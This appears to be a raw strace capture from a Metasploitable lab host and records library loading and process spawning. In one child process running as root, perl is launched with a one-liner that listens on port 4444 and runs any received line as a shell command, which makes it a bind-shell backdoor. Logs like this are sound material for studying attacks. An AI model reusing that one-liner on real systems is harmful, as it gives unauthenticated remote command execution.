10017 07:30:57.567415 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d68000

10017 07:30:57.567447 mmap2(0xb7d7c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d7c000

10017 07:30:57.567478 mmap2(0xb7d7e000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d7e000

10017 07:30:57.567491 close(1)          = 0

10017 07:30:57.567517 munmap(0xb7f0e000, 29913) = 0

10017 07:30:57.567533 open("/etc/ld.so.cache", O_RDONLY) = 1

10017 07:30:57.567546 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10017 07:30:57.567561 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0e000

10017 07:30:57.567571 close(1)          = 0

10017 07:30:57.567581 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.567595 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10017 07:30:57.567608 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10017 07:30:57.567695 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10017 07:30:57.567712 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5e000

10017 07:30:57.567722 mmap2(0xb7d66000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d66000

10017 07:30:57.567738 close(1)          = 0

10017 07:30:57.567750 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.567762 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10017 07:30:57.567779 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10017 07:30:57.567866 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10017 07:30:57.567884 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d53000

10017 07:30:57.567904 mmap2(0xb7d5c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d5c000

10017 07:30:57.567944 close(1)          = 0

10017 07:30:57.567981 munmap(0xb7f0e000, 29913) = 0

10017 07:30:57.567998 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10017 07:30:57.568013 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10017 07:30:57.568025 _llseek(1, 0, [0], SEEK_CUR) = 0

10017 07:30:57.568050 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10017 07:30:57.568066 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f15000

10017 07:30:57.568076 _llseek(1, 1624, [1624], SEEK_SET) = 0

10017 07:30:57.568091 munmap(0xb7f15000, 1624) = 0

10017 07:30:57.568100 close(1)          = 0

10017 07:30:57.568128 getpgrp()         = 3831

10017 07:30:57.568138 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10017 07:30:57.568153 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10017 07:30:57.568168 brk(0x8101000)    = 0x8101000

10017 07:30:57.568198 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10017 07:30:57.568212 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10017 07:30:57.568226 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10017 07:30:57.568262 brk(0x8102000)    = 0x8102000

10017 07:30:57.568287 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10017 07:30:57.568305 stat64("/sbin/AB", 0xbf9667b8) = -1 ENOENT (No such file or directory)

10017 07:30:57.568317 stat64("/bin/AB", 0xbf9667b8) = -1 ENOENT (No such file or directory)

10017 07:30:57.568328 stat64("/usr/sbin/AB", 0xbf9667b8) = -1 ENOENT (No such file or directory)

10017 07:30:57.568340 stat64("/usr/bin/AB", 0xbf9667b8) = -1 ENOENT (No such file or directory)

10017 07:30:57.568352 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10017 07:30:57.568366 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d896f8) = 10018

10018 07:30:57.568442 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10018 07:30:57.568486 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10018 07:30:57.568499 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10018 07:30:57.568511 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10018 07:30:57.568526 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10018 07:30:57.568543 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10018 07:30:57.568556 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10018 07:30:57.568609 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10018 07:30:57.568622 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10018 07:30:57.568687 exit_group(127)   = ?

10017 07:30:57.583715 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:30:57.583834 waitpid(10017,  <unfinished ...>

10017 07:30:57.583933 <... rt_sigprocmask resumed> NULL, 8) = 0

10017 07:30:57.583982 --- SIGCHLD (Child exited) @ 0 (0) ---

10017 07:30:57.584022 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10018

10017 07:30:57.584066 waitpid(-1, 0xbf966438, WNOHANG) = -1 ECHILD (No child processes)

10017 07:30:57.584129 sigreturn()       = ? (mask now [])

10017 07:30:57.584209 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10017 07:30:57.584259 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10017 07:30:57.584289 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10017 07:30:57.584314 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10017 07:30:57.584367 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10017 07:30:57.584446 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10017 07:30:57.584530 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10017 07:30:57.584551 stat64("/sbin/perl", 0xbf9667e8) = -1 ENOENT (No such file or directory)

10017 07:30:57.584581 stat64("/bin/perl", 0xbf9667e8) = -1 ENOENT (No such file or directory)

10017 07:30:57.584611 stat64("/usr/sbin/perl", 0xbf9667e8) = -1 ENOENT (No such file or directory)

10017 07:30:57.584639 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10017 07:30:57.584656 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10017 07:30:57.584680 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10017 07:30:57.584694 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d896f8) = 10019

10019 07:30:57.584735 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10019 07:30:57.584750 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10019 07:30:57.584762 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10019 07:30:57.584774 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10019 07:30:57.584788 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10019 07:30:57.584803 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10019 07:30:57.584815 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10019 07:30:57.584847 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10019 07:30:57.584982 brk(0)            = 0x8153000

10019 07:30:57.585001 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10019 07:30:57.585017 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f60000

10019 07:30:57.585033 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10019 07:30:57.585062 open("/etc/ld.so.cache", O_RDONLY) = 1

10019 07:30:57.585074 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10019 07:30:57.585090 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f58000

10019 07:30:57.585100 close(1)          = 0

10019 07:30:57.585110 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10019 07:30:57.585125 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10019 07:30:57.585138 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10019 07:30:57.585231 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10019 07:30:57.585249 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f54000

10019 07:30:57.585261 mmap2(0xb7f56000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f56000

10019 07:30:57.585276 close(1)          = 0

10019 07:30:57.585287 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10019 07:30:57.585300 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10019 07:30:57.585313 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10019 07:30:57.585410 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10019 07:30:57.585468 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f2f000

10019 07:30:57.585480 mmap2(0xb7f52000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f52000

10019 07:30:57.585495 close(1)          = 0

10019 07:30:57.585507 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10019 07:30:57.585521 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10019 07:30:57.585535 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10019 07:30:57.585634 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10019 07:30:57.585650 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f2e000

10019 07:30:57.585663 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f16000

10019 07:30:57.585673 mmap2(0xb7f2a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f2a000

10019 07:30:57.585687 mmap2(0xb7f2c000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f2c000

10019 07:30:57.585703 close(1)          = 0

10019 07:30:57.585714 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10019 07:30:57.585727 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10019 07:30:57.585741 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10019 07:30:57.585827 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10019 07:30:57.585844 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc7000

10019 07:30:57.585855 mmap2(0xb7f10000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f10000

10019 07:30:57.585869 mmap2(0xb7f13000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f13000

10019 07:30:57.585882 close(1)          = 0

10019 07:30:57.585903 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10019 07:30:57.585942 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10019 07:30:57.585957 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10019 07:30:57.586078 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10019 07:30:57.586095 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d95000

10019 07:30:57.586105 mmap2(0xb7d9e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d9e000

10019 07:30:57.586119 mmap2(0xb7da0000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da0000

10019 07:30:57.586132 close(1)          = 0

10019 07:30:57.586155 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d94000

10019 07:30:57.586167 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d948c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10019 07:30:57.586222 mprotect(0xb7f10000, 4096, PROT_READ) = 0

10019 07:30:57.586250 munmap(0xb7f58000, 29913) = 0

10019 07:30:57.586262 set_tid_address(0xb7d94908) = 10019

10019 07:30:57.586271 set_robust_list(0xb7d94910, 0xc) = 0

10019 07:30:57.586280 futex(0xbfcfc990, 0x81 /* FUTEX_??? */, 1) = 0

10019 07:30:57.586294 rt_sigaction(SIGRTMIN, {0xb7f1a2c0, [], SA_SIGINFO}, NULL, 8) = 0

10019 07:30:57.586306 rt_sigaction(SIGRT_1, {0xb7f1a340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10019 07:30:57.586318 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10019 07:30:57.586331 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10019 07:30:57.586348 uname({sys="Linux", node="metasploitable", ...}) = 0

10019 07:30:57.586512 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10019 07:30:57.586576 brk(0)            = 0x8153000

10019 07:30:57.586585 brk(0x8174000)    = 0x8174000

10019 07:30:57.586628 getuid32()        = 0

10019 07:30:57.593423 geteuid32()       = 0

10019 07:30:57.593423 getgid32()        = 0

10019 07:30:57.593423 getegid32()       = 0

10019 07:30:57.593424 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d73000

10019 07:30:57.593424 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10019 07:30:57.593424 read(1, "w\10\236\267", 4) = 4

10019 07:30:57.593424 close(1)          = 0

10019 07:30:57.593424 time(NULL)        = 1495625457

10019 07:30:57.593425 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfcfc660) = -1 ENOENT (No such file or directory)

10019 07:30:57.593425 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfcfc660) = -1 ENOENT (No such file or directory)

